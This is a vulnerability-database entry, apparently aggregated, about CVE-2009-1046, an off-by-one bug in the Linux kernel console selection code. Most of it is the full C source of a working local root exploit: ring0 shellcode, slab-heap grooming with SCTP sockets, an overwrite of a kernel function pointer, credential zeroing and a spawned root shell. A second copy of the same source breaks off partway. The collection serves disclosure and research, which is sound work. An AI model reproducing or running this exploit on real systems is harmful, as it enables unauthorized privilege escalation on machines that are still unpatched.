Linux Kernel 2.6.24_16-232.6.27_7-102.6.28.3 (Ubuntu 8.048.10 Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Privilege Escalation

2009-07-09T00:00:00

Description

{"id": "EXPLOITPACK:F46DE1A7490F12E98496831D3CD2C519", "vendorId": null, "type": "exploitpack", "bulletinFamily": "exploit", "title": "Linux Kernel 2.6.24_16-232.6.27_7-102.6.28.3 (Ubuntu 8.048.10 Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Privilege Escalation", "description": "\nLinux Kernel 2.6.24_16-232.6.27_7-102.6.28.3 (Ubuntu 8.048.10 Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Privilege Escalation", "published": "2009-07-09T00:00:00", "modified": "2009-07-09T00:00:00", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 4.7, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 3.4, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "", "reporter": "sgrakkyu", "references": [], "cvelist": ["CVE-2009-1046"], "immutableFields": [], "lastseen": "2020-04-01T19:04:27", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1046"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1787-1:1654D", "DEBIAN:DSA-1800-1:C8938"]}, {"type": "exploitdb", "idList": ["EDB-ID:9083"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1787.NASL", "DEBIAN_DSA-1800.NASL", "SUSE_11_0_KERNEL-090814.NASL", "SUSE_KERNEL-6109.NASL", "SUSE_KERNEL-6113.NASL", "UBUNTU_USN-751-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063908", "OPENVAS:136141256231063939", "OPENVAS:136141256231064034", "OPENVAS:136141256231064761", "OPENVAS:136141256231065812", "OPENVAS:63908", "OPENVAS:63939", "OPENVAS:64034", "OPENVAS:64175", "OPENVAS:64761", "OPENVAS:65812"]}, {"type": "osv", "idList": ["OSV:DSA-1787-1", "OSV:DSA-1800-1"]}, {"type": "redhat", "idList": ["RHSA-2009:0451"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21767", "SECURITYVULNS:DOC:28783", "SECURITYVULNS:VULN:9889"]}, {"type": "seebug", "idList": ["SSV:11780", "SSV:66685"]}, {"type": "suse", "idList": ["SUSE-SA:2009:017", "SUSE-SA:2009:045"]}, {"type": "ubuntu", "idList": ["USN-751-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2009-1046"]}, {"type": "veracode", "idList": ["VERACODE:23845"]}]}, "score": {"value": 1.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-1046"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1787-1:1654D"]}, {"type": "exploitdb", "idList": ["EDB-ID:9083"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/LINUXRPM-RHSA-2009-0451/"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1800.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:64175"]}, {"type": "redhat", "idList": ["RHSA-2009:0451"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9889"]}, {"type": "seebug", "idList": ["SSV:11780"]}, {"type": "suse", "idList": ["SUSE-SA:2009:045"]}, {"type": "ubuntu", "idList": ["USN-751-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2009-1046"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2009-1046", "epss": "0.000710000", "percentile": "0.290110000", "modified": "2023-03-15"}], "vulnersScore": 1.0}, "_state": {"dependencies": 1678960072, "score": 1678961349, "epss": 1678962009}, "_internal": {"score_hash": "f73e9a484c6e2813f1738bcd5991378d"}, "sourceData": "/* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\n * Linux Kernel <= 2.6.28.3 \n *\n * coded by: sgrakkyu <at> antifork.org\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\n *\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\n *\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \n * - physical login\n * - ptrace() against some process with the same uid already attached to a VC\n * - remote management ..\n *\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\n *\n * Designed to be built as x86-64 binary only (SLUB ONLY)\n * SCTP stack has to be available\n * \n * Tested on target:\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\n *\n */\n\n\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <sched.h>\n#include <errno.h>\n#include <netinet/in.h>\n#include <netinet/sctp.h>\n#include <arpa/inet.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <sys/ioctl.h>\n#include <stdlib.h>\n#include <string.h>\n#include <linux/tiocl.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <sys/mman.h>\n#include <sched.h>\n#include <unistd.h>\n#include <fcntl.h>\n\n#ifndef __x86_64__\n#error \"Architecture Unsupported\"\n#error \"This code was written for x86-64 target and has to be built as x86-64 binary\"\n#else\n\n#ifndef __u8\n#define __u8 uint8_t\n#endif\n#ifndef __u16\n#define __u16 uint16_t\n#endif\n#ifndef __u32\n#define __u32 uint32_t\n#endif\n#ifndef __u64 \n#define __u64 uint64_t\n#endif\n\n\n#define STREAM_ZERO 10\n#define STREAM_ZERO_ALT 12\n\n#define SCTP_STREAM 22\n#define STACK_SIZE 0x1000\n#define PAGE_SIZE 0x1000\n#define STRUCT_PAGE 0x0000000000000000\n#define STRUCT_PAGE_ALT 0x0000000100000000 \n#define CODE_PAGE 0x0000000000010000\n#define LOCALHOST \"127.0.0.1\"\n#define KMALLOC \"kmalloc-128\"\n#define TIMER_LIST_FOPS \"timer_list_fops\"\n\n#define __msg_f(format, args...) \\\n do { fprintf(stdout, format, ## args); } while(0)\n\n#define __msg(msg) \\\n do { fprintf(stdout, \"%s\", msg); } while(0)\n\n#define __fatal_errno(msg) \\\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\n\n#define __fatal(msg) \\\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\n\n\n\n#define CJUMP_OFF 13\nchar ring0[]=\n\"\\x57\" // push %rdi\n\"\\x50\" // push %rax\n\"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00\" // mov %gs:0x0,%rdi\n\"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // mov xxx, %rax\n\"\\xff\\xd0\" // callq *%rax\n\"\\x58\" // pop %rax\n\"\\x5f\" // pop %rdi\n\"\\xc3\"; // retq\n\n\n/* conn struct */\nstatic __u16 srvport;\nstruct sockaddr_in server_s;\nstatic struct sockaddr_in caddr;\n\n/* some fds.. */\nstatic int g_array[10];\nstatic int fd_zmap_srv=-1;\nstatic int kmalloc_fd=-1;\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \n\n/* misc */\nstatic int dorec = 0, cankill=1, highpage=0;\nstatic char cstack[STACK_SIZE*2];\nstatic __u16 zstream=STREAM_ZERO;\nstatic __u32 uid,gid;\nstatic __u64 fops;\nstatic pid_t child=0;\nstatic char symbuf[20000];\n\nstatic void __free_stuff()\n{\n int i;\n for(i=3; i<2048; i++) \n {\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \n unsafe_fd[2] == i || unsafe_fd[3] == i))\n continue; \n\n close(i);\n }\n}\n\nstatic void bindcpu()\n{\n cpu_set_t set;\n CPU_ZERO(&set);\n CPU_SET(0, &set);\n \n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\n __fatal_errno(\"setaffinity\");\n}\n\n/* parse functions are not bof-free:) */\nstatic __u64 get_fops_addr()\n{\n FILE* stream;\n char fbuf[256];\n char addr[32];\n \n stream = fopen(\"/proc/kallsyms\", \"r\");\n if(stream < 0)\n __fatal_errno(\"open: kallsyms\");\n\n memset(fbuf, 0x00, sizeof(fbuf));\n while(fgets(fbuf, 256, stream) > 0)\n {\n char *p = fbuf;\n char *a = addr;\n memset(addr, 0x00, sizeof(addr));\n fbuf[strlen(fbuf)-1] = 0;\n while(*p != ' ')\n *a++ = *p++; \n p += 3;\n if(!strcmp(p, TIMER_LIST_FOPS))\n return strtoul(addr, NULL, 16); \n }\n\n return 0;\n}\n\nstatic int get_total_object(int fd)\n{\n char name[32];\n char used[32];\n char total[32];\n char *ptr[] = {name, used, total};\n int ret,i,toread=sizeof(symbuf)-1;\n char *p = symbuf;\n\n lseek(fd, 0, SEEK_SET);\n memset(symbuf, 0x00, sizeof(symbuf));\n while( (ret = read(fd, p, toread)) > 0)\n {\n p += ret; \n toread -= ret;\n }\n\n p = symbuf;\n do\n {\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\n {\n char *d = ptr[i];\n while(*p != ' ')\n *d++ = *p++; \n *d = 0;\n while(*p == ' ')\n p++;\n }\n \n while(*p++ != '\\n');\n \n if(!strcmp(KMALLOC, name))\n return atoi(total); \n\n } while(*p != 0);\n return 0;\n}\n\n\nstatic void ring0c(void* t)\n{\n int i;\n __u32 *p = t;\n for(i=0; i<1100; i++,p++)\n {\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\n {\n p[0] = p[1] = p[2] = p[3] = 0;\n p[4] = p[5] = p[6] = p[7] = 0;\n /* dont care about caps */\n break;\n }\n }\n}\n\n\nstatic int get_kmalloc_fd()\n{\n int fd;\n fd = open(\"/proc/slabinfo\", O_RDONLY);\n if(fd < 0)\n __fatal_errno(\"open: slabinfo\");\n return fd;\n}\n\n\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\n{\n int ret;\n ret = sctp_sendmsg(fd, \"a\", 1,\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\n 0, 0, channel, 0 ,0);\n return ret;\n}\n\n\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\n{\n struct sctp_initmsg msg;\n int val=1;\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\n msg.sinit_num_ostreams=out; \n msg.sinit_max_instreams=in;\n setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\n}\n\n\nstatic int create_and_init(void)\n{\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\n if(fd < 0)\n __fatal_errno(\"socket: sctp\");\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\n return fd;\n}\n\n\nstatic void connect_peer(int fd, struct sockaddr_in *s)\n{ \n int ret;\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\n if(ret < 0)\n __fatal_errno(\"connect: one peer\");\n}\n\n\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\n{\n connect_peer(fd,s);\n write_sctp(fd, s, stream);\n}\n\n\nstatic int clone_thread(void*useless)\n{\n int o = 1;\n int c=0,idx=0;\n int fd, ret;\n struct sockaddr_in tmp;\n socklen_t len;\n\n bindcpu();\n server_s.sin_family = PF_INET;\n server_s.sin_port = htons(srvport); \n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\n\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\n if(fd < 0)\n return -1;\n\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\n\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\n if(ret < 0)\n return -1;\n\n ret = listen(fd, 100);\n if(ret < 0)\n return -1;\n\n len = sizeof(struct sockaddr_in);\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\n {\n if(dorec != 0 && c >= dorec && idx < 10)\n {\n g_array[idx] = ret;\n if(idx==9)\n {\n fd_zmap_srv = ret;\n caddr = tmp;\n break;\n }\n idx++;\n }\n c++; \n write_sctp(ret, &tmp, zstream);\n }\n \n sleep(1);\n return 0; \n}\n\n\nstatic int do_mmap(unsigned long base, int npages)\n{\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\n PROT_READ|PROT_WRITE|PROT_EXEC, \n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\n\n if(MAP_FAILED == addr)\n return -1;\n\n memset(addr, 0x00, PAGE_SIZE*npages);\n \n return 0;\n}\n\npid_t start_listener()\n{\n pid_t pid;\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\n \n return pid;\n} \n\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\n{\n int i,fd;\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\n int next=8;\n\n for(i=0; next != 0; i++)\n {\n fd = create_and_init();\n\n tmp_n_objs = get_total_object(kmalloc_fd); \n if(!dorec && tmp_n_objs != n_objs)\n dorec=i; \n\n conn_and_write(fd, s, stream);\n if(dorec)\n next--;\n }\n}\n\n\nstatic void clr(int fd)\n{\n /* use termcap instead..*/\n write(fd, \"\\33[H\\33[J\", 6); \n}\n\nstatic char tiobuffer[2048];\nvoid alloc_tioclinux()\n{\n int i;\n char out[128*3];\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \n struct tiocl_selection *sel;\n char *t;\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\n t = (char*)v; \n sel = (struct tiocl_selection *)(t+1);\n memset(out, 0x41, sizeof(out)); \n for(i=0; i<128; i++) \n {\n tiobuffer[(i*3)]=utf8[0];\n tiobuffer[(i*3)+1]=utf8[1];\n tiobuffer[(i*3)+2]=utf8[2];\n }\n\n *t = TIOCL_SETSEL;\n sel->xs = 1;\n sel->ys = 1;\n sel->xe = 43;\n //sel->xe = 42; /* no overflow */\n sel->ye = 1;\n \n write(1, tiobuffer, sizeof(tiobuffer));\n if(ioctl(1, TIOCLINUX, v) < 0)\n __fatal(\"[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n\");\n}\n\n\n\nstatic void migrate_evil_fd()\n{\n int i;\n pid_t child;\n\n __msg(\"[**] Migrate evil unsafe fds to child process..\\n\");\n child = fork();\n if(!child)\n {\n\n /* preserve evil fds */\n setsid(); \n if(!cankill) /* cant die .. */\n while(1)\n sleep(1);\n else\n {\n sleep(10); /* wait execve() before */ \n for(i=0; i<4; i++)\n close(unsafe_fd[i]); \n\n exit(1);\n }\n }\n else\n {\n if(!cankill)\n __msg_f(\"[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n\", child);\n }\n}\n\n\nstatic void trigger_fault()\n{\n char *argv[]={\"/bin/sh\", NULL};\n int fd,i;\n\n fd = open(\"/proc/timer_list\", O_RDONLY);\n if(fd >= 0)\n {\n ioctl(fd, 0, 0);\n __free_stuff();\n migrate_evil_fd();\n \n for(i=0; i<4; i++)\n close(unsafe_fd[i]);\n\n if(!getuid())\n {\n __msg(\"[**] Got root!\\n\");\n execve(\"/bin/sh\", argv, NULL); \n }\n }\n else\n {\n __msg(\"[**] Cannot open /proc/timer_list\");\n __free_stuff();\n }\n}\n\n\n\nstatic void overwrite_fops( int sender, \n struct sockaddr_in *to_receiver,\n int receiver)\n{\n char *p = NULL;\n if(!highpage)\n p++;\n else\n p = (void*)STRUCT_PAGE_ALT;\n\n __u64 *uip = (__u64*)p; \n *uip = fops;\n write_sctp(sender, to_receiver, 1); \n sleep(1);\n trigger_fault();\n}\n\nstatic __u16 get_port()\n{\n __u16 r = (__u16)getpid();\n if(r <= 0x400)\n r+=0x400;\n return r;\n}\n\nint main(int argc, char *argv[])\n{\n int peerx, peery,i;\n __u64 *patch;\n\n srvport = get_port();\n\n uid=getuid();\n gid=getgid();\n fops=get_fops_addr() + 64; \n if(!fops)\n {\n __msg(\"[!!] Unable to locate symbols...\\n\");\n return 1;\n }\n\n __msg_f(\"[**] Patching ring0 shellcode with userspace addr: %p\\n\", ring0c);\n patch = (__u64*)(ring0 + CJUMP_OFF);\n *patch = (__u64)ring0c;\n\n __msg_f(\"[**] Using port: %d\\n\", srvport);\n __msg(\"[**] Getting slab info...\\n\");\n kmalloc_fd = get_kmalloc_fd();\n if(!get_total_object(kmalloc_fd)) \n __fatal(\"[!!] Only SLUB allocator supported\\n\");\n \n\n __msg(\"[**] Mapping Segments...\\n\"); \n __msg(\"[**] Trying mapping safe page...\");\n if(do_mmap(STRUCT_PAGE, 1) < 0)\n {\n __msg(\"Page Protection Present (Unable to Map Safe Page)\\n\");\n __msg(\"[**] Mapping High Address Page (dont kill placeholder child)\\n\");\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\n __fatal_errno(\"mmap\"); \n\n cankill=0; /* dont kill child owning unsafe fds.. */\n highpage=1; /* ssnmap in higher pages */\n zstream=STREAM_ZERO_ALT; \n } \n else\n __msg(\"Done\\n\");\n\n __msg(\"[**] Mapping Code Page... \");\n if(do_mmap(CODE_PAGE, 1) < 0)\n __fatal_errno(\"mmap\");\n else\n __msg(\"Done\\n\");\n\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\n\n __msg(\"[**] Binding on CPU 0\\n\"); \n bindcpu(); \n\n __msg(\"[**] Start Server Thread..\\n\");\n child = start_listener();\n sleep(3); \n \n do_socks(&server_s, zstream);\n for(i=0; i<7; i++)\n {\n close(g_array[8-1-i]); \n }\n clr(1); \n alloc_tioclinux(); // trigger overflow\n peerx = create_and_init();\n connect_peer(peerx, &server_s);\n peery = create_and_init();\n connect_peer(peery, &server_s);\n \n sleep(1);\n\n unsafe_fd[0] = peerx;\n unsafe_fd[1] = g_array[8];\n unsafe_fd[2] = peery;\n unsafe_fd[3] = g_array[9];\n \n __msg(\"\\n\"); \n __msg_f(\"[**] Umapped end-to-end fd: %d\\n\", fd_zmap_srv); \n __msg_f(\"[**] Unsafe fd: ( \");\n\n for(i=0; i<4; i++)\n __msg_f(\"%d \", unsafe_fd[i]);\n __msg(\")\\n\"); \n \n\n __msg(\"[**] Hijacking fops...\\n\");\n overwrite_fops(fd_zmap_srv, &caddr, peery);\n\n /* if u get here.. something nasty happens...may crash..*/\n __free_stuff();\n __msg(\"[**] Exploit failed.. freezing process\\n\");\n kill(getpid(), SIGSTOP);\n return 0;\n}\n\n#endif\n\n// milw0rm.com [2009-07-09]", "affectedSoftware": [], "appercut": {}, "exploitpack": {"type": "local", "platform": "linux_x86-64"}, "hackapp": {}, "toolHref": "", "w3af": {}}

{"ubuntucve": [{"lastseen": "2022-08-04T14:40:09", "description": "The console selection feature in the Linux kernel 2.6.28 before 2.6.28.4,\n2.6.25, and possibly earlier versions, when the UTF-8 console is used,\nallows physically proximate attackers to cause a denial of service (memory\ncorruption) by selecting a small number of 3-byte UTF-8 characters, which\ntriggers an \"off-by-two memory error.\" NOTE: it is not clear whether this\nissue crosses privilege boundaries.", "cvss3": {}, "published": "2009-03-23T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1046", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1046"], "modified": "2009-03-23T00:00:00", "id": "UB:CVE-2009-1046", "href": "https://ubuntu.com/security/CVE-2009-1046", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}}], "seebug": [{"lastseen": "2017-11-19T15:23:48", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1046"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66685", "id": "SSV:66685", "sourceData": "\n /* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\r\n * Linux Kernel <= 2.6.28.3 \r\n *\r\n * coded by: sgrakkyu <at> antifork.org\r\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\r\n *\r\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\r\n *\r\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \r\n * - physical login\r\n * - ptrace() against some process with the same uid already attached to a VC\r\n * - remote management ..\r\n *\r\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\r\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\r\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\r\n *\r\n * Designed to be built as x86-64 binary only (SLUB ONLY)\r\n * SCTP stack has to be available\r\n * \r\n * Tested on target:\r\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\r\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\r\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\r\n *\r\n */\r\n\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <netinet/sctp.h>\r\n#include <arpa/inet.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/ioctl.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <linux/tiocl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <sys/mman.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\n#ifndef __x86_64__\r\n#error "Architecture Unsupported"\r\n#error "This code was written for x86-64 target and has to be built as x86-64 binary"\r\n#else\r\n\r\n#ifndef __u8\r\n#define __u8 uint8_t\r\n#endif\r\n#ifndef __u16\r\n#define __u16 uint16_t\r\n#endif\r\n#ifndef __u32\r\n#define __u32 uint32_t\r\n#endif\r\n#ifndef __u64 \r\n#define __u64 uint64_t\r\n#endif\r\n\r\n\r\n#define STREAM_ZERO 10\r\n#define STREAM_ZERO_ALT 12\r\n\r\n#define SCTP_STREAM 22\r\n#define STACK_SIZE 0x1000\r\n#define PAGE_SIZE 0x1000\r\n#define STRUCT_PAGE 0x0000000000000000\r\n#define STRUCT_PAGE_ALT 0x0000000100000000 \r\n#define CODE_PAGE 0x0000000000010000\r\n#define LOCALHOST "127.0.0.1"\r\n#define KMALLOC "kmalloc-128"\r\n#define TIMER_LIST_FOPS "timer_list_fops"\r\n\r\n#define __msg_f(format, args...) \\\r\n do { fprintf(stdout, format, ## args); } while(0)\r\n\r\n#define __msg(msg) \\\r\n do { fprintf(stdout, "%s", msg); } while(0)\r\n\r\n#define __fatal_errno(msg) \\\r\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\r\n\r\n#define __fatal(msg) \\\r\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\r\n\r\n\r\n\r\n#define CJUMP_OFF 13\r\nchar ring0[]=\r\n"\\x57" // push %rdi\r\n"\\x50" // push %rax\r\n"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00" // mov %gs:0x0,%rdi\r\n"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41" // mov xxx, %rax\r\n"\\xff\\xd0" // callq *%rax\r\n"\\x58" // pop %rax\r\n"\\x5f" // pop %rdi\r\n"\\xc3"; // retq\r\n\r\n\r\n/* conn struct */\r\nstatic __u16 srvport;\r\nstruct sockaddr_in server_s;\r\nstatic struct sockaddr_in caddr;\r\n\r\n/* some fds.. */\r\nstatic int g_array[10];\r\nstatic int fd_zmap_srv=-1;\r\nstatic int kmalloc_fd=-1;\r\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \r\n\r\n/* misc */\r\nstatic int dorec = 0, cankill=1, highpage=0;\r\nstatic char cstack[STACK_SIZE*2];\r\nstatic __u16 zstream=STREAM_ZERO;\r\nstatic __u32 uid,gid;\r\nstatic __u64 fops;\r\nstatic pid_t child=0;\r\nstatic char symbuf[20000];\r\n\r\nstatic void __free_stuff()\r\n{\r\n int i;\r\n for(i=3; i<2048; i++) \r\n {\r\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \r\n unsafe_fd[2] == i || unsafe_fd[3] == i))\r\n continue; \r\n\r\n close(i);\r\n }\r\n}\r\n\r\nstatic void bindcpu()\r\n{\r\n cpu_set_t set;\r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\r\n __fatal_errno("setaffinity");\r\n}\r\n\r\n/* parse functions are not bof-free:) */\r\nstatic __u64 get_fops_addr()\r\n{\r\n FILE* stream;\r\n char fbuf[256];\r\n char addr[32];\r\n \r\n stream = fopen("/proc/kallsyms", "r");\r\n if(stream < 0)\r\n __fatal_errno("open: kallsyms");\r\n\r\n memset(fbuf, 0x00, sizeof(fbuf));\r\n while(fgets(fbuf, 256, stream) > 0)\r\n {\r\n char *p = fbuf;\r\n char *a = addr;\r\n memset(addr, 0x00, sizeof(addr));\r\n fbuf[strlen(fbuf)-1] = 0;\r\n while(*p != ' ')\r\n *a++ = *p++; \r\n p += 3;\r\n if(!strcmp(p, TIMER_LIST_FOPS))\r\n return strtoul(addr, NULL, 16); \r\n }\r\n\r\n return 0;\r\n}\r\n\r\nstatic int get_total_object(int fd)\r\n{\r\n char name[32];\r\n char used[32];\r\n char total[32];\r\n char *ptr[] = {name, used, total};\r\n int ret,i,toread=sizeof(symbuf)-1;\r\n char *p = symbuf;\r\n\r\n lseek(fd, 0, SEEK_SET);\r\n memset(symbuf, 0x00, sizeof(symbuf));\r\n while( (ret = read(fd, p, toread)) > 0)\r\n {\r\n p += ret; \r\n toread -= ret;\r\n }\r\n\r\n p = symbuf;\r\n do\r\n {\r\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\r\n {\r\n char *d = ptr[i];\r\n while(*p != ' ')\r\n *d++ = *p++; \r\n *d = 0;\r\n while(*p == ' ')\r\n p++;\r\n }\r\n \r\n while(*p++ != '\\n');\r\n \r\n if(!strcmp(KMALLOC, name))\r\n return atoi(total); \r\n\r\n } while(*p != 0);\r\n return 0;\r\n}\r\n\r\n\r\nstatic void ring0c(void* t)\r\n{\r\n int i;\r\n __u32 *p = t;\r\n for(i=0; i<1100; i++,p++)\r\n {\r\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\r\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\r\n {\r\n p[0] = p[1] = p[2] = p[3] = 0;\r\n p[4] = p[5] = p[6] = p[7] = 0;\r\n /* dont care about caps */\r\n break;\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int get_kmalloc_fd()\r\n{\r\n int fd;\r\n fd = open("/proc/slabinfo", O_RDONLY);\r\n if(fd < 0)\r\n __fatal_errno("open: slabinfo");\r\n return fd;\r\n}\r\n\r\n\r\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\r\n{\r\n int ret;\r\n ret = sctp_sendmsg(fd, "a", 1,\r\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\r\n 0, 0, channel, 0 ,0);\r\n return ret;\r\n}\r\n\r\n\r\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\r\n{\r\n struct sctp_initmsg msg;\r\n int val=1;\r\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\r\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\r\n msg.sinit_num_ostreams=out; \r\n msg.sinit_max_instreams=in;\r\n setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\r\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\r\n}\r\n\r\n\r\nstatic int create_and_init(void)\r\n{\r\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n __fatal_errno("socket: sctp");\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\r\n return fd;\r\n}\r\n\r\n\r\nstatic void connect_peer(int fd, struct sockaddr_in *s)\r\n{ \r\n int ret;\r\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n __fatal_errno("connect: one 